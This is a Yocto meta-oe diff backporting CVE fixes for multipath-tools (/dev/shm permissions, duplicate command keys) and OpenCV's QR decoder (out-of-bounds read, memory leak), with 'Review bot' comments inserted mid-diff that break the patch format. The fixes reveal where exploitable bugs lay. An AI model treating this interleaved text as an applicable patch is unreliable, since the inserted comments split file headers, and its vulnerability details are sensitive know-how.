@@ -0,0 +1,159 @@ +From 23e13a52a6213b11eda9a3b09df455f495f74e8d Mon Sep 17 00:00:00 2001 +From: Yogita Urade <yogita.urade@windriver.com> +Date: Tue, 13 Dec 2022 09:18:33 +0000 +Subject: [PATCH] multipath-tools: use /run instead of /dev/shm + +/dev/shm may have unsafe permissions. Use /run instead. +Use systemd's tmpfiles.d mechanism to create /run/multipath +early during boot. + +For backward compatibilty, make the runtime directory configurable +via the "runtimedir" make variable. + +Signed-off-by: Martin Wilck <mwilck@suse.com> +Reviewed-by: Benjamin Marzinski <bmarzins@redhat.com> + +CVE: CVE-2022-41973 + +References: +https://nvd.nist.gov/vuln/detail/CVE-2022-41973 + +Upstream-Status: Backport [https://github.com/opensvc/multipath-tools/commit/cb57b930fa690ab79b3904846634681685e3470f] + +Signed-off-by: Yogita Urade <yogita.urade@windriver.com> +--- + .gitignore | 2 ++ + Makefile.inc | 7 ++++++- + libmultipath/defaults.h | 3 +-- + multipath/Makefile | 11 ++++++++--- + multipath/{multipath.rules => multipath.rules.in} | 4 ++-- + multipath/tmpfiles.conf.in | 1 + + 6 files changed, 20 insertions(+), 8 deletions(-) + rename multipath/{multipath.rules => multipath.rules.in} (95%) + create mode 100644 multipath/tmpfiles.conf.in + +diff --git a/.gitignore b/.gitignore +index 9926756b..f90b0350 100644 +--- a/.gitignore ++++ b/.gitignore +@@ -8,6 +8,8 @@ + *.d + kpartx/kpartx + multipath/multipath ++multipath/multipath.rules ++multipath/tmpfiles.conf + multipathd/multipathd + mpathpersist/mpathpersist + .nfs* +diff --git a/Makefile.inc b/Makefile.inc +index 4eb08eed..648f91b4 100644 +--- a/Makefile.inc ++++ b/Makefile.inc +@@ -44,6 +44,7 @@ exec_prefix = $(prefix) + usr_prefix = $(prefix) + bindir = $(exec_prefix)/usr/sbin + libudevdir = $(prefix)/$(SYSTEMDPATH)/udev ++tmpfilesdir = $(prefix)/$(SYSTEMDPATH)/tmpfiles.d + udevrulesdir = $(libudevdir)/rules.d + multipathdir = $(TOPDIR)/libmultipath + man8dir = $(prefix)/usr/share/man/man8 +@@ -60,6 +61,7 @@ libdmmpdir = 
$(TOPDIR)/libdmmp + nvmedir = $(TOPDIR)/libmultipath/nvme + includedir = $(prefix)/usr/include + pkgconfdir = $(usrlibdir)/pkgconfig ++runtimedir := /$(RUN) + + GZIP = gzip -9 -c + RM = rm -f +@@ -95,7 +97,10 @@ OPTFLAGS += -Wextra -Wstrict-prototypes -Wformat=2 -Werror=implicit-int \ + -Wno-unused-parameter -Werror=cast-qual \ + -Werror=discarded-qualifiers + +-CPPFLAGS := -Wp,-D_FORTIFY_SOURCE=2 ++CPPFLAGS := $(FORTIFY_OPT) \ ++ -DBIN_DIR=\"$(bindir)\" -DMULTIPATH_DIR=\"$(plugindir)\" -DRUN_DIR=\"${RUN}\" \ ++ -DRUNTIME_DIR=\"$(runtimedir)\" \ ++ -DCONFIG_DIR=\"$(configdir)\" -DEXTRAVERSION=\"$(EXTRAVERSION)\" -MMD -MP + CFLAGS := $(OPTFLAGS) -DBIN_DIR=\"$(bindir)\" -DLIB_STRING=\"${LIB}\" -DRUN_DIR=\"${RUN}\" \ + -MMD -MP $(CFLAGS) + BIN_CFLAGS = -fPIE -DPIE +diff --git a/libmultipath/defaults.h b/libmultipath/defaults.h +index c2164c16..908e0ca3 100644 +--- a/libmultipath/defaults.h ++++ b/libmultipath/defaults.h +@@ -64,8 +64,7 @@ + #define DEFAULT_WWIDS_FILE "/etc/multipath/wwids" + #define DEFAULT_PRKEYS_FILE "/etc/multipath/prkeys" + #define DEFAULT_CONFIG_DIR "/etc/multipath/conf.d" +-#define MULTIPATH_SHM_BASE "/dev/shm/multipath/" +- ++#define MULTIPATH_SHM_BASE RUNTIME_DIR "/multipath/" + + static inline char *set_default(char *str) + { +diff --git a/multipath/Makefile b/multipath/Makefile +index e720c7f6..28976546 100644 +--- a/multipath/Makefile ++++ b/multipath/Makefile +@@ -12,7 +12,7 @@ EXEC = multipath + + OBJS = main.o + +-all: $(EXEC) ++all: $(EXEC) multipath.rules tmpfiles.conf + + $(EXEC): $(OBJS) $(multipathdir)/libmultipath.so $(mpathcmddir)/libmpathcmd.so + $(CC) $(CFLAGS) $(OBJS) -o $(EXEC) $(LDFLAGS) $(LIBDEPS) +@@ -26,7 +26,9 @@ install: + $(INSTALL_PROGRAM) -m 755 mpathconf $(DESTDIR)$(bindir)/ + $(INSTALL_PROGRAM) -d $(DESTDIR)$(udevrulesdir) + $(INSTALL_PROGRAM) -m 644 11-dm-mpath.rules $(DESTDIR)$(udevrulesdir) +- $(INSTALL_PROGRAM) -m 644 $(EXEC).rules $(DESTDIR)$(libudevdir)/rules.d/62-multipath.rules ++ $(INSTALL_PROGRAM) -m 644 
multipath.rules $(DESTDIR)$(udevrulesdir)/56-multipath.rules ++ $(INSTALL_PROGRAM) -d $(DESTDIR)$(tmpfilesdir) ++ $(INSTALL_PROGRAM) -m 644 tmpfiles.conf $(DESTDIR)$(tmpfilesdir)/multipath.conf + $(INSTALL_PROGRAM) -d $(DESTDIR)$(man8dir) + $(INSTALL_PROGRAM) -m 644 $(EXEC).8.gz $(DESTDIR)$(man8dir) + $(INSTALL_PROGRAM) -d $(DESTDIR)$(man5dir) +@@ -43,9 +45,12 @@ uninstall: + $(RM) $(DESTDIR)$(man8dir)/mpathconf.8.gz + + clean: dep_clean +- $(RM) core *.o $(EXEC) *.gz ++ $(RM) core *.o $(EXEC) multipath.rules tmpfiles.conf + + include $(wildcard $(OBJS:.o=.d)) + + dep_clean: + $(RM) $(OBJS:.o=.d) ++ ++%: %.in ++ sed 's,@RUNTIME_DIR@,$(runtimedir),' $< >$@ +diff --git a/multipath/multipath.rules b/multipath/multipath.rules.in +similarity index 95% +rename from multipath/multipath.rules +rename to multipath/multipath.rules.in +index 0486bf70..5fb499e6 100644 +--- a/multipath/multipath.rules ++++ b/multipath/multipath.rules.in +@@ -1,8 +1,8 @@ + # Set DM_MULTIPATH_DEVICE_PATH if the device should be handled by multipath + SUBSYSTEM!="block", GOTO="end_mpath" + KERNEL!="sd*|dasd*|nvme*", GOTO="end_mpath" +-ACTION=="remove", TEST=="/dev/shm/multipath/find_multipaths/$major:$minor", \ +- RUN+="/usr/bin/rm -f /dev/shm/multipath/find_multipaths/$major:$minor" ++ACTION=="remove", TEST=="@RUNTIME_DIR@/multipath/find_multipaths/$major:$minor", \ ++ RUN+="/usr/bin/rm -f @RUNTIME_DIR@/multipath/find_multipaths/$major:$minor" + ACTION!="add|change", GOTO="end_mpath" + + IMPORT{cmdline}="nompath" +diff --git a/multipath/tmpfiles.conf.in b/multipath/tmpfiles.conf.in +new file mode 100644 +index 00000000..21be438a +--- /dev/null ++++ b/multipath/tmpfiles.conf.in +@@ -0,0 +1 @@ ++d @RUNTIME_DIR@/multipath 0700 root root - +-- +2.32.0 + diff --git a/meta-oe/recipes-support/multipath-tools/files/CVE-2022-41974.patch b/meta-oe/recipes-support/multipath-tools/files/CVE-2022-41974.patch new file mode 100644 index 0000000000..7cdb5f9bda --- /dev/null 
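Review bot: The Makefile.inc hunk replaces `CPPFLAGS := -Wp,-D_FORTIFY_SOURCE=2` with `CPPFLAGS := $(FORTIFY_OPT) ...`, but no visible line defines `FORTIFY_OPT`, `plugindir` or `configdir`. If the 0.8.4 Makefile.inc does not define them either, make expands them to nothing, so the build silently loses `_FORTIFY_SOURCE` and gains empty `-DMULTIPATH_DIR=\"\"` and `-DCONFIG_DIR=\"\"` defines. For this backport it looks sufficient to keep the original flag and add only what the fix needs: `CPPFLAGS := -Wp,-D_FORTIFY_SOURCE=2 -DRUNTIME_DIR=\"$(runtimedir)\"`. Separately, the 0700 `/run/multipath` directory is created only through the tmpfiles.d snippet, and the hunks do not show what creates it on an image without systemd, so that case needs checking before relying on the new location.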
+++ b/meta-oe/recipes-support/multipath-tools/files/CVE-2022-41974.patch 
@@ -0,0 +1,164 @@ +From 0168696f95b5c610c3861ced8ef98accd1a83b91 Mon Sep 17 00:00:00 2001 +From: Benjamin Marzinski <bmarzins@redhat.com> +Date: Tue, 27 Sep 2022 12:36:37 +0200 +Subject: [PATCH] multipathd: ignore duplicated multipathd command keys + +multipath adds rather than or-s the values of command keys. Fix this. +Also, return an invalid fingerprint if a key is used more than once. + +CVE: CVE-2022-41974 + +References: +https://nvd.nist.gov/vuln/detail/CVE-2022-41974 +https://github.com/opensvc/multipath-tools/issues/59 + +Upstream-Status: Backport +[https://github.com/openSUSE/multipath-tools/commit/fbbf280a0e26026c19879d938ebb2a8200b6357c] + +Signed-off-by: Benjamin Marzinski <bmarzins@redhat.com> + +Signed-off-by: Yogita Urade <yogita.urade@windriver.com> +--- + multipathd/cli.c | 8 ++-- + multipathd/main.c | 104 +++++++++++++++++++++++----------------------- + 2 files changed, 57 insertions(+), 55 deletions(-) + +diff --git a/multipathd/cli.c b/multipathd/cli.c +index 800c0fbe..0a266761 100644 +--- a/multipathd/cli.c ++++ b/multipathd/cli.c +@@ -336,9 +336,11 @@ fingerprint(vector vec) + if (!vec) + return 0; + +- vector_foreach_slot(vec, kw, i) +- fp += kw->code; +- ++ vector_foreach_slot(vec, kw, i) { ++ if (fp & kw->code) ++ return (uint64_t)-1; ++ fp |= kw->code; ++ } + return fp; + } + +diff --git a/multipathd/main.c b/multipathd/main.c +index 8baf9abe..975287d2 100644 +--- a/multipathd/main.c ++++ b/multipathd/main.c +@@ -1522,61 +1522,61 @@ uxlsnrloop (void * ap) + /* Tell main thread that thread has started */ + post_config_state(DAEMON_CONFIGURE); + +- set_handler_callback(LIST+PATHS, cli_list_paths); +- set_handler_callback(LIST+PATHS+FMT, cli_list_paths_fmt); +- set_handler_callback(LIST+PATHS+RAW+FMT, cli_list_paths_raw); +- set_handler_callback(LIST+PATH, cli_list_path); +- set_handler_callback(LIST+MAPS, cli_list_maps); +- set_handler_callback(LIST+STATUS, cli_list_status); +- set_unlocked_handler_callback(LIST+DAEMON, cli_list_daemon); +- 
set_handler_callback(LIST+MAPS+STATUS, cli_list_maps_status); +- set_handler_callback(LIST+MAPS+STATS, cli_list_maps_stats); +- set_handler_callback(LIST+MAPS+FMT, cli_list_maps_fmt); +- set_handler_callback(LIST+MAPS+RAW+FMT, cli_list_maps_raw); +- set_handler_callback(LIST+MAPS+TOPOLOGY, cli_list_maps_topology); +- set_handler_callback(LIST+TOPOLOGY, cli_list_maps_topology); +- set_handler_callback(LIST+MAPS+JSON, cli_list_maps_json); +- set_handler_callback(LIST+MAP+TOPOLOGY, cli_list_map_topology); +- set_handler_callback(LIST+MAP+FMT, cli_list_map_fmt); +- set_handler_callback(LIST+MAP+RAW+FMT, cli_list_map_fmt); +- set_handler_callback(LIST+MAP+JSON, cli_list_map_json); +- set_handler_callback(LIST+CONFIG+LOCAL, cli_list_config_local); +- set_handler_callback(LIST+CONFIG, cli_list_config); +- set_handler_callback(LIST+BLACKLIST, cli_list_blacklist); +- set_handler_callback(LIST+DEVICES, cli_list_devices); +- set_handler_callback(LIST+WILDCARDS, cli_list_wildcards); +- set_handler_callback(RESET+MAPS+STATS, cli_reset_maps_stats); +- set_handler_callback(RESET+MAP+STATS, cli_reset_map_stats); +- set_handler_callback(ADD+PATH, cli_add_path); +- set_handler_callback(DEL+PATH, cli_del_path); +- set_handler_callback(ADD+MAP, cli_add_map); +- set_handler_callback(DEL+MAP, cli_del_map); +- set_handler_callback(SWITCH+MAP+GROUP, cli_switch_group); ++ set_handler_callback(LIST|PATHS, cli_list_paths); ++ set_handler_callback(LIST|PATHS|FMT, cli_list_paths_fmt); ++ set_handler_callback(LIST|PATHS|RAW|FMT, cli_list_paths_raw); ++ set_handler_callback(LIST|PATH, cli_list_path); ++ set_handler_callback(LIST|MAPS, cli_list_maps); ++ set_handler_callback(LIST|STATUS, cli_list_status); ++ set_unlocked_handler_callback(LIST|DAEMON, cli_list_daemon); ++ set_handler_callback(LIST|MAPS|STATUS, cli_list_maps_status); ++ set_handler_callback(LIST|MAPS|STATS, cli_list_maps_stats); ++ set_handler_callback(LIST|MAPS|FMT, cli_list_maps_fmt); ++ set_handler_callback(LIST|MAPS|RAW|FMT, 
cli_list_maps_raw); ++ set_handler_callback(LIST|MAPS|TOPOLOGY, cli_list_maps_topology); ++ set_handler_callback(LIST|TOPOLOGY, cli_list_maps_topology); ++ set_handler_callback(LIST|MAPS|JSON, cli_list_maps_json); ++ set_handler_callback(LIST|MAP|TOPOLOGY, cli_list_map_topology); ++ set_handler_callback(LIST|MAP|FMT, cli_list_map_fmt); ++ set_handler_callback(LIST|MAP|RAW|FMT, cli_list_map_fmt); ++ set_handler_callback(LIST|MAP|JSON, cli_list_map_json); ++ set_handler_callback(LIST|CONFIG|LOCAL, cli_list_config_local); ++ set_handler_callback(LIST|CONFIG, cli_list_config); ++ set_handler_callback(LIST|BLACKLIST, cli_list_blacklist); ++ set_handler_callback(LIST|DEVICES, cli_list_devices); ++ set_handler_callback(LIST|WILDCARDS, cli_list_wildcards); ++ set_handler_callback(RESET|MAPS|STATS, cli_reset_maps_stats); ++ set_handler_callback(RESET|MAP|STATS, cli_reset_map_stats); ++ set_handler_callback(ADD|PATH, cli_add_path); ++ set_handler_callback(DEL|PATH, cli_del_path); ++ set_handler_callback(ADD|MAP, cli_add_map); ++ set_handler_callback(DEL|MAP, cli_del_map); ++ set_handler_callback(SWITCH|MAP|GROUP, cli_switch_group); + set_unlocked_handler_callback(RECONFIGURE, cli_reconfigure); +- set_handler_callback(SUSPEND+MAP, cli_suspend); +- set_handler_callback(RESUME+MAP, cli_resume); +- set_handler_callback(RESIZE+MAP, cli_resize); +- set_handler_callback(RELOAD+MAP, cli_reload); +- set_handler_callback(RESET+MAP, cli_reassign); +- set_handler_callback(REINSTATE+PATH, cli_reinstate); +- set_handler_callback(FAIL+PATH, cli_fail); +- set_handler_callback(DISABLEQ+MAP, cli_disable_queueing); +- set_handler_callback(RESTOREQ+MAP, cli_restore_queueing); +- set_handler_callback(DISABLEQ+MAPS, cli_disable_all_queueing); +- set_handler_callback(RESTOREQ+MAPS, cli_restore_all_queueing); ++ set_handler_callback(SUSPEND|MAP, cli_suspend); ++ set_handler_callback(RESUME|MAP, cli_resume); ++ set_handler_callback(RESIZE|MAP, cli_resize); ++ set_handler_callback(RELOAD|MAP, 
cli_reload); ++ set_handler_callback(RESET|MAP, cli_reassign); ++ set_handler_callback(REINSTATE|PATH, cli_reinstate); ++ set_handler_callback(FAIL|PATH, cli_fail); ++ set_handler_callback(DISABLEQ|MAP, cli_disable_queueing); ++ set_handler_callback(RESTOREQ|MAP, cli_restore_queueing); ++ set_handler_callback(DISABLEQ|MAPS, cli_disable_all_queueing); ++ set_handler_callback(RESTOREQ|MAPS, cli_restore_all_queueing); + set_unlocked_handler_callback(QUIT, cli_quit); + set_unlocked_handler_callback(SHUTDOWN, cli_shutdown); +- set_handler_callback(GETPRSTATUS+MAP, cli_getprstatus); +- set_handler_callback(SETPRSTATUS+MAP, cli_setprstatus); +- set_handler_callback(UNSETPRSTATUS+MAP, cli_unsetprstatus); +- set_handler_callback(FORCEQ+DAEMON, cli_force_no_daemon_q); +- set_handler_callback(RESTOREQ+DAEMON, cli_restore_no_daemon_q); +- set_handler_callback(GETPRKEY+MAP, cli_getprkey); +- set_handler_callback(SETPRKEY+MAP+KEY, cli_setprkey); +- set_handler_callback(UNSETPRKEY+MAP, cli_unsetprkey); +- set_handler_callback(SETMARGINAL+PATH, cli_set_marginal); +- set_handler_callback(UNSETMARGINAL+PATH, cli_unset_marginal); +- set_handler_callback(UNSETMARGINAL+MAP, cli_unset_all_marginal); ++ set_handler_callback(GETPRSTATUS|MAP, cli_getprstatus); ++ set_handler_callback(SETPRSTATUS|MAP, cli_setprstatus); ++ set_handler_callback(UNSETPRSTATUS|MAP, cli_unsetprstatus); ++ set_handler_callback(FORCEQ|DAEMON, cli_force_no_daemon_q); ++ set_handler_callback(RESTOREQ|DAEMON, cli_restore_no_daemon_q); ++ set_handler_callback(GETPRKEY|MAP, cli_getprkey); ++ set_handler_callback(SETPRKEY|MAP|KEY, cli_setprkey); ++ set_handler_callback(UNSETPRKEY|MAP, cli_unsetprkey); ++ set_handler_callback(SETMARGINAL|PATH, cli_set_marginal); ++ set_handler_callback(UNSETMARGINAL|PATH, cli_unset_marginal); ++ set_handler_callback(UNSETMARGINAL|MAP, cli_unset_all_marginal); + + umask(077); + uxsock_listen(&uxsock_trigger, ux_sock, ap); +-- +2.31.1 
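Review bot: `fingerprint()` in multipathd/cli.c now returns a bare `(uint64_t)-1` for a repeated keyword, and the OR-based scheme is only sound if every keyword `code` is a distinct single bit; neither assumption is written down in the hunk. I would add a comment above the loop, e.g. `/* Key codes are disjoint bit flags; a repeated key is rejected with an all-ones fingerprint, which is assumed not to match any registered handler. */`, and give the sentinel a name. It is also worth searching the rest of this 0.8.4 tree for handler registrations or lookups that still combine keys with `+`, since only the `uxlsnrloop` table in multipathd/main.c is converted here and both functions extend beyond the hunks.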
diff --git a/meta-oe/recipes-support/multipath-tools/multipath-tools_0.8.4.bb b/meta-oe/recipes-support/multipath-tools/multipath-tools_0.8.4.bb index 5a8db08771..0d51263f66 100644 --- a/meta-oe/recipes-support/multipath-tools/multipath-tools_0.8.4.bb +++ b/meta-oe/recipes-support/multipath-tools/multipath-tools_0.8.4.bb @@ -48,6 +48,8 @@ SRC_URI = "git://github.com/opensvc/multipath-tools.git;protocol=http;branch=mas file://0001-add-explicit-dependency-on-libraries.patch \ file://0001-fix-boolean-value-with-json-c-0.14.patch \ file://0001-libmultipath-uevent.c-fix-error-handling-for-udev_mo.patch \ + file://0001-multipath-tools-use-run-instead-of-dev-shm.patch \ + file://CVE-2022-41974.patch \ " LIC_FILES_CHKSUM = "file://COPYING;md5=5f30f0716dfdd0d91eb439ebec522ec2" @@ -120,3 +122,6 @@ FILES:kpartx = "${base_sbindir}/kpartx \ RDEPENDS:${PN} += "kpartx" PARALLEL_MAKE = "" + +FILES:${PN}-libs += "usr/lib/*.so.*" +FILES:${PN}-libs += "usr/lib/tmpfiles.d/*" diff --git a/meta-oe/recipes-support/nss/nss/0001-nss-fix-support-cross-compiling.patch b/meta-oe/recipes-support/nss/nss/0001-nss-fix-support-cross-compiling.patch index eb6174a7b0..950fae667a 100644 --- a/meta-oe/recipes-support/nss/nss/0001-nss-fix-support-cross-compiling.patch +++ b/meta-oe/recipes-support/nss/nss/0001-nss-fix-support-cross-compiling.patch @@ -18,7 +18,12 @@ diff --git a/nss/coreconf/arch.mk b/nss/coreconf/arch.mk index 2012d18..78fca62 100644 --- a/nss/coreconf/arch.mk +++ b/nss/coreconf/arch.mk -@@ -30,7 +30,7 @@ OS_TEST := $(shell uname -m) +@@ -26,11 +26,11 @@ OS_ARCH := $(subst /,_,$(shell uname -s) + # Attempt to differentiate between sparc and x86 Solaris + # + +-OS_TEST := $(shell uname -m) ++OS_TEST ?= $(shell uname -m) ifeq ($(OS_TEST),i86pc) OS_RELEASE := $(shell uname -r)_$(OS_TEST) else diff --git a/meta-oe/recipes-support/opencv/opencv/CVE-2023-2617.patch b/meta-oe/recipes-support/opencv/opencv/CVE-2023-2617.patch new file mode 100644 index 0000000000..e5eafd4790 --- /dev/null 
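Review bot: The two new `FILES:${PN}-libs` lines in multipath-tools_0.8.4.bb hard-code `usr/lib/...` instead of the layout variables, so they stop matching as soon as `libdir` is not `/usr/lib` (multilib, for instance). `${libdir}/*.so.*` and `${nonarch_libdir}/tmpfiles.d/*` would be the usual spelling, assuming the Makefiles install to those locations. Packaging the tmpfiles.d snippet in `${PN}-libs` also means the 0700 `/run/multipath` directory the CVE-2022-41973 fix depends on exists only when that package is installed; shipping it with the package that contains the daemon looks safer unless a runtime dependency already guarantees it.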
+++ b/meta-oe/recipes-support/opencv/opencv/CVE-2023-2617.patch 
@@ -0,0 +1,88 @@
+commit ccc277247ac1a7aef0a90353edcdec35fbc5903c
+Author: Nano <nanoapezlk@gmail.com>
+Date: Wed Apr 26 15:09:52 2023 +0800
+
+ fix(wechat_qrcode): Init nBytes after the count value is determined (#3480)
+
+ * fix(wechat_qrcode): Initialize nBytes after the count value is determined
+
+ * fix(wechat_qrcode): Incorrect count data repair
+
+ * chore: format expr
+
+ * fix(wechat_qrcode): Avoid null pointer exception
+
+ * fix(wechat_qrcode): return when bytes_ is empty
+
+ * test(wechat_qrcode): add test case
+
+ ---------
+
+ Co-authored-by: GZTime <Time.GZ@outlook.com>
+
+CVE: CVE-2023-2617
+
+Upstream-Status: Backport [https://github.com/opencv/opencv_contrib/commit/ccc277247ac1a7aef0a90353edcdec35fbc5903c]
+
+Signed-off-by: Soumya <soumya.sambu@windriver.com>
+---
+
+diff --git a/modules/wechat_qrcode/src/zxing/qrcode/decoder/decoded_bit_stream_parser.cpp b/modules/wechat_qrcode/src/zxing/qrcode/decoder/decoded_bit_stream_parser.cpp
+index 05de793c..b3a0a69c 100644
+--- a/modules/wechat_qrcode/src/zxing/qrcode/decoder/decoded_bit_stream_parser.cpp
++++ b/modules/wechat_qrcode/src/zxing/qrcode/decoder/decoded_bit_stream_parser.cpp
+@@ -65,7 +65,8 @@ void DecodedBitStreamParser::append(std::string& result, string const& in,
+
+ void DecodedBitStreamParser::append(std::string& result, const char* bufIn, size_t nIn,
+ ErrorHandler& err_handler) {
+- if (err_handler.ErrCode()) return;
++ // avoid null pointer exception
++ if (err_handler.ErrCode() || bufIn == nullptr) return;
+ #ifndef NO_ICONV_INSIDE
+ if (nIn == 0) {
+ return;
+@@ -190,16 +191,20 @@ void DecodedBitStreamParser::decodeByteSegment(Ref<BitSource> bits_, string& res
+ CharacterSetECI* currentCharacterSetECI,
+ ArrayRef<ArrayRef<char> >& byteSegments,
+ ErrorHandler& err_handler) {
+- int nBytes = count;
+ BitSource& bits(*bits_);
+ // Don't crash trying to read more bits than we have available.
+ int available = bits.available();
+ // try to repair count data if count data is invalid
+ if (count * 8 > available) {
+- count = (available + 7 / 8);
++ count = (available + 7) / 8;
+ }
++ size_t nBytes = count;
++
++ ArrayRef<char> bytes_(nBytes);
++ // issue https://github.com/opencv/opencv_contrib/issues/3478
++ if (bytes_->empty())
++ return;
+
+- ArrayRef<char> bytes_(count);
+ char* readBytes = &(*bytes_)[0];
+ for (int i = 0; i < count; i++) {
+ // readBytes[i] = (char) bits.readBits(8);
+diff --git a/modules/wechat_qrcode/test/test_qrcode.cpp b/modules/wechat_qrcode/test/test_qrcode.cpp
+index d59932b8..ec2559b0 100644
+--- a/modules/wechat_qrcode/test/test_qrcode.cpp
++++ b/modules/wechat_qrcode/test/test_qrcode.cpp
+@@ -289,5 +289,16 @@ TEST_P(Objdetect_QRCode_Multi, regression) {
+ INSTANTIATE_TEST_CASE_P(/**/, Objdetect_QRCode_Curved, testing::ValuesIn(qrcode_images_curved));
+ // INSTANTIATE_TEST_CASE_P(/**/, Objdetect_QRCode_Multi, testing::ValuesIn(qrcode_images_multiple));
+
++TEST(Objdetect_QRCode_bug, issue_3478) {
++ auto detector = wechat_qrcode::WeChatQRCode();
++ std::string image_path = findDataFile("qrcode/issue_3478.png");
++ Mat src = imread(image_path, IMREAD_GRAYSCALE);
++ ASSERT_FALSE(src.empty()) << "Can't read image: " << image_path;
++ std::vector<std::string> outs = detector.detectAndDecode(src);
++ ASSERT_EQ(1, (int) outs.size());
++ ASSERT_EQ(16, (int) outs[0].size());
++ ASSERT_EQ("KFCVW50 ", outs[0]);
++}
++
+ } // namespace
+ } // namespace opencv_test
diff --git a/meta-oe/recipes-support/opencv/opencv/CVE-2023-2618.patch b/meta-oe/recipes-support/opencv/opencv/CVE-2023-2618.patch
new file mode 100644
index 0000000000..4cd3003e3c
--- /dev/null
+++ b/meta-oe/recipes-support/opencv/opencv/CVE-2023-2618.patch
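Review bot: The repaired `count = (available + 7) / 8;` in decodeByteSegment rounds up, so when `available` is not a multiple of 8 the loop `for (int i = 0; i < count; i++)` still asks for up to 7 bits more than the stream holds on its last byte. The hunk ends before the actual read inside the loop (only the commented-out `readBits(8)` line is visible), so whether that final short read is caught through `err_handler` cannot be confirmed from here; if it is not, rounding down with `count = available / 8;` would keep every read inside the available bits. Because this is a backport, the patch should stay identical to upstream, so the right step is to check the upstream loop body and record the result in the patch header rather than diverge silently.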
@@ -0,0 +1,32 @@
+From 2b62ff6181163eea029ed1cab11363b4996e9cd6 Mon Sep 17 00:00:00 2001
+From: Nano <nanoapezlk@gmail.com>
+Date: Thu, 27 Apr 2023 17:38:35 +0800
+Subject: [PATCH] fix(wechat_qrcode): fixed memory leaks
+
+CVE: CVE-2023-2618
+
+Upstream-Status: Backport [https://github.com/opencv/opencv_contrib/pull/3484/commits/2b62ff6181163eea029ed1cab11363b4996e9cd6]
+
+Signed-off-by: Narpat Mali <narpat.mali@windriver.com>
+---
+ .../src/zxing/qrcode/decoder/decoded_bit_stream_parser.cpp | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/modules/wechat_qrcode/src/zxing/qrcode/decoder/decoded_bit_stream_parser.cpp b/modules/wechat_qrcode/src/zxing/qrcode/decoder/decoded_bit_stream_parser.cpp
+index b3a0a69c..f02435d5 100644
+--- a/modules/wechat_qrcode/src/zxing/qrcode/decoder/decoded_bit_stream_parser.cpp
++++ b/modules/wechat_qrcode/src/zxing/qrcode/decoder/decoded_bit_stream_parser.cpp
+@@ -127,7 +127,10 @@ void DecodedBitStreamParser::decodeHanziSegment(Ref<BitSource> bits_, string& re
+ while (count > 0) {
+ // Each 13 bits encodes a 2-byte character
+ int twoBytes = bits.readBits(13, err_handler);
+- if (err_handler.ErrCode()) return;
++ if (err_handler.ErrCode()) {
++ delete[] buffer;
++ return;
++ }
+ int assembledTwoBytes = ((twoBytes / 0x060) << 8) | (twoBytes % 0x060);
+ if (assembledTwoBytes < 0x003BF) {
+ // In the 0xA1A1 to 0xAAFE range
+--
+2.40.0
diff --git a/meta-oe/recipes-support/opencv/opencv_4.5.5.bb b/meta-oe/recipes-support/opencv/opencv_4.5.5.bb
index e4fb676f7e..5b5685f990 100644
--- a/meta-oe/recipes-support/opencv/opencv_4.5.5.bb
+++ b/meta-oe/recipes-support/opencv/opencv_4.5.5.bb
@@ -39,12 +39,12 @@ IPP_MD5 = "${@ipp_md5sum(d)}" SRCREV_FORMAT = "opencv_contrib_ipp_boostdesc_vgg" SRC_URI = "git://github.com/opencv/opencv.git;name=opencv;branch=master;protocol=https \ - git://github.com/opencv/opencv_contrib.git;destsuffix=contrib;name=contrib;branch=master;protocol=https \ - git://github.com/opencv/opencv_3rdparty.git;branch=ippicv/master_20191018;destsuffix=ipp;name=ipp;protocol=https \ - git://github.com/opencv/opencv_3rdparty.git;branch=contrib_xfeatures2d_boostdesc_20161012;destsuffix=boostdesc;name=boostdesc;protocol=https \ - git://github.com/opencv/opencv_3rdparty.git;branch=contrib_xfeatures2d_vgg_20160317;destsuffix=vgg;name=vgg;protocol=https \ - git://github.com/opencv/opencv_3rdparty.git;branch=contrib_face_alignment_20170818;destsuffix=face;name=face;protocol=https \ - git://github.com/WeChatCV/opencv_3rdparty.git;branch=wechat_qrcode;destsuffix=wechat_qrcode;name=wechat-qrcode;protocol=https \ + git://github.com/opencv/opencv_contrib.git;destsuffix=git/contrib;name=contrib;branch=master;protocol=https \ + git://github.com/opencv/opencv_3rdparty.git;branch=ippicv/master_20191018;destsuffix=git/ipp;name=ipp;protocol=https \ + git://github.com/opencv/opencv_3rdparty.git;branch=contrib_xfeatures2d_boostdesc_20161012;destsuffix=git/boostdesc;name=boostdesc;protocol=https \ + git://github.com/opencv/opencv_3rdparty.git;branch=contrib_xfeatures2d_vgg_20160317;destsuffix=git/vgg;name=vgg;protocol=https \ + git://github.com/opencv/opencv_3rdparty.git;branch=contrib_face_alignment_20170818;destsuffix=git/face;name=face;protocol=https \ + git://github.com/WeChatCV/opencv_3rdparty.git;branch=wechat_qrcode;destsuffix=git/wechat_qrcode;name=wechat-qrcode;protocol=https \ file://0001-3rdparty-ippicv-Use-pre-downloaded-ipp.patch \ file://0003-To-fix-errors-as-following.patch \ file://0001-Temporarliy-work-around-deprecated-ffmpeg-RAW-functi.patch \ 
@@ -52,8 +52,10 @@ SRC_URI = "git://github.com/opencv/opencv.git;name=opencv;branch=master;protocol file://download.patch \ file://0001-Make-ts-module-external.patch \ file://0001-core-vsx-update-vec_absd-workaround-condition.patch \ + file://CVE-2023-2617.patch;patchdir=contrib \ + file://CVE-2023-2618.patch;patchdir=contrib \ " -SRC_URI:append:riscv64 = " file://0001-Use-Os-to-compile-tinyxml2.cpp.patch;patchdir=../contrib" +SRC_URI:append:riscv64 = " file://0001-Use-Os-to-compile-tinyxml2.cpp.patch;patchdir=contrib" S = "${WORKDIR}/git" @@ -62,7 +64,7 @@ S = "${WORKDIR}/git" OPENCV_DLDIR = "${WORKDIR}/downloads" do_unpack_extra() { - tar xzf ${WORKDIR}/ipp/ippicv/${IPP_FILENAME} -C ${WORKDIR} + tar xzf ${S}/ipp/ippicv/${IPP_FILENAME} -C ${S} md5() { # Return the MD5 of $1 @@ -77,22 +79,22 @@ do_unpack_extra() { test -e $DEST || ln -s $F $DEST done } - cache xfeatures2d/boostdesc ${WORKDIR}/boostdesc/*.i - cache xfeatures2d/vgg ${WORKDIR}/vgg/*.i - cache data ${WORKDIR}/face/*.dat - cache wechat_qrcode ${WORKDIR}/wechat_qrcode/*.caffemodel - cache wechat_qrcode ${WORKDIR}/wechat_qrcode/*.prototxt + cache xfeatures2d/boostdesc ${S}/boostdesc/*.i + cache xfeatures2d/vgg ${S}/vgg/*.i + cache data ${S}/face/*.dat + cache wechat_qrcode ${S}/wechat_qrcode/*.caffemodel + cache wechat_qrcode 